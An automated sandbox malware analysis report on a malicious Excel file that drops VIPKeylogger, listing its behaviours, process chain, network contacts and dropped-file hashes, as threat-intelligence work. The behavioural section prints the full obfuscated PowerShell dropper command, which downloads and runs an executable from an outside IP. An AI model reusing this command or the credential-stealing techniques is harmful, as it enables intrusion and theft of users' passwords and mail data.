Malware Analysis Report

2025-05-28 14:54

Sample ID 240821-hxm4navgqb
Target ALFATECH-4500068045.xls
SHA256 a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d
Tags
vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d

Threat Level: Known bad

The file ALFATECH-4500068045.xls was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx

VIPKeylogger

Process spawned unexpected child process

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates physical storage devices

Browser Information Discovery

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

outlook_win_path

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious behavior: MapViewOfSection

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

outlook_office_path

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-21 07:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-21 07:07

Reported

2024-08-21 07:09

Platform

win7-20240708-en

Max time kernel

117s

Max time network

120s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 264 set thread context of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2944 wrote to memory of 2188 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 112 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 112 wrote to memory of 2912 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2128 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\sihost.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 | N/A | C:\Users\Admin\AppData\Roaming\sihost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp"

C:\Users\Admin\AppData\Roaming\sihost.exe

"C:\Users\Admin\AppData\Roaming\sihost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\sihost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 jamp.to udp
US 172.67.188.67:443 jamp.to tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 172.67.188.67:443 jamp.to tcp
NL 45.66.231.209:80 45.66.231.209 tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.16.170.123:80 crl.microsoft.com tcp

Files


C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 5c0c586fcc0295465e226ba96427cf97
SHA1 d52cd521b3847f56dfe33c4b858b86063a33a584
SHA256 5b698c684d3e08ec24433ea3bdecc350406f9b4934d4ec5d66b68e51d2f9a08d
SHA512 e71aa78a5a62fbdd763f4b6f0f741f68567504777b2aeff429c9ae51296d2d562e671ca95b793b53f67152443806ad956b3c9f6705a4fcf2a50323f5ddd025a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 7fb5fa1534dcf77f2125b2403b30a0ee
SHA1 365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA256 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512 a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 0231a37c450fd71f499a766ae7cde4c1
SHA1 f7f3c7c55ef4a628173ea34e7697f8526b083d2b
SHA256 4e0dd896a5b11132d722b155cde5f03a61807583cc413bd91e04fc2c4ccc3dcd
SHA512 6bd6f7b8ff82f52eb754ab490a03453117e67973bcb53ed7233e167a663b26578b8b4da1a907bc99b535b3cb9294b0907e054eb427a0677898ebbc1adfc4bbf6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 183cf0f46c5d878b4da3706777d441a7
SHA1 662d0457e60699c16a3f4978c0f4d7a2fa41ee24
SHA256 54a5b037f119c7c72288e8938f3b0d1fb9be28ceee4712df639ebd1fec9bebb1
SHA512 0c79c1fdb6135dbd9845493fb8201e3a067f4ec831fdc05d7623435cc39ec492dabffa890d9626e0f3f2c575780312e502205fb94d7656e0438693a3412b4bfa

C:\Users\Admin\AppData\Local\Temp\Cab81FC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\icreamnet[1].hta

MD5 7103c506472571a74df192733c3a951f
SHA1 e33b0379480d8796cc6f076240e4bedd4ed491d3
SHA256 c71171c8f9e4481d14b506d2ae0c37ef7702e610e898bcf146c72523c86aec7f
SHA512 2f61230549b40684e797e044935bfe1fb74d969abf185087aebd2b8f9cffdefb09bef7eeb381d8ce492e877eae00131405eb961e284a0c87f76b819dafc759b5

\??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline

MD5 fa15298a795e8bfc3b0cb550e623c67c
SHA1 a33e468fb287322ac76c443884ab2ce769211277
SHA256 9ca437fe90a7d431850a3364d39cc66a981baa00ec91901b221a4a0d6f515489
SHA512 9814e53d180703a03673ca6721f52f8a6d2051362e53994992d26f745af71d5061c9e4c1d1d407afed7dc603e014b73b8df51706b9c316440a92a4e52abef29a

\??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.0.cs

MD5 602090135e2e0d9cd49e6059ebe19206
SHA1 aff8001ee39f6d2b36cd1b74f87c22b152c55580
SHA256 b4f6cf69835c797d9964ff6ed7bd8223ade6e4c80053ee0659d2cf6d1fd4c8b9
SHA512 664b7d40c32eaa692af57d2afdc4f0235c8062b354177d490868dce23b1b91bae33ad567b8a700a9c50e66fa507a1a9404faba92bfec26c4dfa21425ea5c83e1

\??\c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp

MD5 7b62578350fbc3e85a2c8ee625ad270f
SHA1 e1454131de8f74f5d918b719903122ca29ee2fb3
SHA256 852cc899d42c51ca2c327c5775481ca7bba3e075e670794fa8964973fbebd554
SHA512 ae891dc02a7efdb525ad3c7e36cb23cf61768da2871200c58914b175bcac598c5215acafc14788bf60c3fe3289946f0c35395d435d8405df8928dd4339a7186a

C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp

MD5 9fc4d43938ebb2a9c1a6a5c9e8e1b7da
SHA1 2cccc89f39e676854fa9c81b591f0c5ea154b97f
SHA256 27838d11900ed1b250a86cc776bc5edba978128c944a371065c74c00a4cbd153
SHA512 32b4fbbd96fe1b6fddd3427ec725f3cb5684fec095d4107dbd9bcfddfc5256d4f5a13879f57901299ef9ef0c0c4229158467398fc16b106c6f4515716f34890e

C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.dll

MD5 69329fad78578ff7b1c18ab40d90f650
SHA1 22be61573dba4a668eb79dcf447185d3b966678d
SHA256 2376de8780975313d031cf80e11904d5c23bc2d70701e6b59515824b6e20eee4
SHA512 227c108cb1e3e594ddb12dad2ef8b4a3a9a7b4797b495f78073ac7708bf82094409ba59b28f21d625c15117714525c701578ddf8d60ec4d440167c2c1ced1115

C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.pdb

MD5 16cfde2da53cade58911abeebc95cbe8
SHA1 f0b8a9b295d92f515044a6f59e6247fca8cf6091
SHA256 3b3e179c787f21c82988759e6f801dc1091190e78d01edcff64f2382e966acf7
SHA512 4fd6cc9b4f9790a5bc9fea1fd336ff2fec82ca8f36bd2fc7cec3282c47fa24c0e6e074e906683edc61255006b4026f32579f58a68ed38f93d9ae2a92f3ebe510

C:\Users\Admin\AppData\Roaming\sihost.exe

MD5 cf7c1cb71ad11a8c4ab07ffc3afa2f67
SHA1 68c5f1c0e97237c4fff232e099353792b160df1a
SHA256 6eb12a217689847fa90ae6ac61401fe0349653808da3e4386abf01ee4f56e2f9
SHA512 997d7e6bcd9aa8ac33f6bb667edfe40efc522f47dd54284895b15736edb86052284409a3a6a9ab1c9e9066f507599a1824cf6a935849cb7346e2464c90ccb904


Analysis: behavioral2

Detonation Overview

Submitted

2024-08-21 07:07

Reported

2024-08-21 07:09

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

126s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3092 wrote to memory of 64 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe
PID 3092 wrote to memory of 64 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 jamp.to udp
US 104.21.40.193:443 jamp.to tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
US 8.8.8.8:53 193.40.21.104.in-addr.arpa udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.231.66.45.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files
